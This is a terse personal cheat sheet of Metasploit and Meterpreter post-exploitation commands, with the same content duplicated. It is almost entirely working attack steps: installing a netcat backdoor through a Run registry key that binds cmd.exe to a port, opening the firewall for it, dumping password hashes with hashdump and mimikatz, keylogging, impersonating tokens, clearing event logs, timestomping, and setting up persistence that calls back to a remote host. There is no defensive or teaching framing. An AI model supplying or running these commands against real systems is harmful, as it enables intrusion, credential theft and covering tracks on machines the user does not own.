JPMonglis/msf_wiki.txt

## msf_wiki.txt
 ## msf netcat backdoor in persistance
-  netcat is uncluded in metasploit
-
- upload /usr/share/windwos-binaries/nc.exe C:\\windows\\system32  ## must have system rights
-
-
- ## registry key adding
- echo reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run
- echo reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
- echo reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc
-
- ## firewall config nedd shell with system auth
- netsh advifrewall firewall add rule "netcat" protocol=tcp localport=443 dir=in action=allow
- program"=C:windows\system32\nc.exe"
-
- ## GETgui
- run getgui -h
- getgui -u 'username' -p 'password'  ## system privs {rdekstop -u username -p password IP}
-
-
- ## PORT FORWARDING
- portfwd -h
- portfwd add -l 443 -p 443 -r IP
-
- ## modify files
- timestomp -h
-
- ## KEYLOGGING
- keyscan_start
- keyscan_dump
- keyscan_stop
-
-
- ## persistance
- persistance -U -i 15 -p 443 -r lhost
-
-
-
- ## mimikatz
-
- load mimikatz
- help mimikatz
- mimikatz_command -f version
- mimikatz_command -f blah::
- kerberos
- mimikatz_command -f sandump::hashes
- mimikatz_command -f sandump::bootkey
- mimikatz_command -f crypto::
 MSF wiki B'
search type:exploit platform:windows
search author:HDM type:exploit
search cve:1234
show ..exploits
*grep vnc search type:exploit

mtpr> getuid

mtpr> getprivs

mtpr> ifconfig

mtpr> sysinfo

mtpr> hashdump

mtpr> download C:\\path\\to\\file

mtpr> upload fileToUpload C:\\path

mtpr> execute -f programToRun -i H

mtpr> search -f test.*

mtpr> run post/windows/gather/enum_applications

mtpr> run post/windows/gather/enum_services

mtpr> getpid payload.exe

mtpr> migrate svchost.exe

mtpr> keyscan_start - dump - stop

mtpr> clearev

##Running incognito

mtpr> use incognito

mtpr> list_tokens

mtpr> impersonate_token user\\user

##Backdoor with netcat

mtpr> upload usr/share/windows-binaries/nc.exe C:\\path\\to\\file\\

mtpr> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

mtpr> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\\path\\nc.exe -Ldp 445 -e cmd.exe

mtpr> reg queyval -k HKLM\\software\\microsoft\\windows\\currentversion\\run

shell> netsh advfirewall firewall add rule name="netcat" protocol=tcp localport=445 dir=in action=allow program="C:\\path\\to\\exe

##Remote Desktop Access

mtpr> run getgui -u newUser -p newPass
rdesktop -u user -p pass 192.168.1.1

##Port Forwarding

mtpr> portfwd add -l 445 -p 445 -r 192.168.1.1

mtpr> run persistance -U -i 15 -o 443 -r 192.168.1.1

mtpr> use mimikatz

mtpr> mimikatz_command -f version

mtpr> mimikatz_command -f blah::

mtpr> kerberos

mtpr> help mimikatz

mtpr> mimikatz_command -f samdump::

mtpr> mimikatz_command -f samdump::bootkey
	## msf netcat backdoor in persistance
	- netcat is uncluded in metasploit
	-
	- upload /usr/share/windwos-binaries/nc.exe C:\\windows\\system32 ## must have system rights
	-
	-
	- ## registry key adding
	- echo reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run
	- echo reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
	- echo reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc
	-
	- ## firewall config nedd shell with system auth
	- netsh advifrewall firewall add rule "netcat" protocol=tcp localport=443 dir=in action=allow
	- program"=C:windows\system32\nc.exe"
	-
	- ## GETgui
	- run getgui -h
	- getgui -u 'username' -p 'password' ## system privs {rdekstop -u username -p password IP}
	-
	-
	- ## PORT FORWARDING
	- portfwd -h
	- portfwd add -l 443 -p 443 -r IP
	-
	- ## modify files
	- timestomp -h
	-
	- ## KEYLOGGING
	- keyscan_start
	- keyscan_dump
	- keyscan_stop
	-
	-
	- ## persistance
	- persistance -U -i 15 -p 443 -r lhost
	-
	-
	-
	- ## mimikatz
	-
	- load mimikatz
	- help mimikatz
	- mimikatz_command -f version
	- mimikatz_command -f blah::
	- kerberos
	- mimikatz_command -f sandump::hashes
	- mimikatz_command -f sandump::bootkey
	- mimikatz_command -f crypto::
	MSF wiki B'
	search type:exploit platform:windows
	search author:HDM type:exploit
	search cve:1234
	show ..exploits
	*grep vnc search type:exploit

	mtpr> getuid

	mtpr> getprivs

	mtpr> ifconfig

	mtpr> sysinfo

	mtpr> hashdump

	mtpr> download C:\\path\\to\\file

	mtpr> upload fileToUpload C:\\path

	mtpr> execute -f programToRun -i H

	mtpr> search -f test.*

	mtpr> run post/windows/gather/enum_applications

	mtpr> run post/windows/gather/enum_services

	mtpr> getpid payload.exe

	mtpr> migrate svchost.exe

	mtpr> keyscan_start - dump - stop

	mtpr> clearev

	##Running incognito

	mtpr> use incognito

	mtpr> list_tokens

	mtpr> impersonate_token user\\user

	##Backdoor with netcat

	mtpr> upload usr/share/windows-binaries/nc.exe C:\\path\\to\\file\\

	mtpr> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

	mtpr> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\\path\\nc.exe -Ldp 445 -e cmd.exe

	mtpr> reg queyval -k HKLM\\software\\microsoft\\windows\\currentversion\\run

	shell> netsh advfirewall firewall add rule name="netcat" protocol=tcp localport=445 dir=in action=allow program="C:\\path\\to\\exe

	##Remote Desktop Access

	mtpr> run getgui -u newUser -p newPass
	rdesktop -u user -p pass 192.168.1.1

	##Port Forwarding

	mtpr> portfwd add -l 445 -p 445 -r 192.168.1.1

	mtpr> run persistance -U -i 15 -o 443 -r 192.168.1.1

	mtpr> use mimikatz

	mtpr> mimikatz_command -f version

	mtpr> mimikatz_command -f blah::

	mtpr> kerberos

	mtpr> help mimikatz

	mtpr> mimikatz_command -f samdump::

	mtpr> mimikatz_command -f samdump::bootkey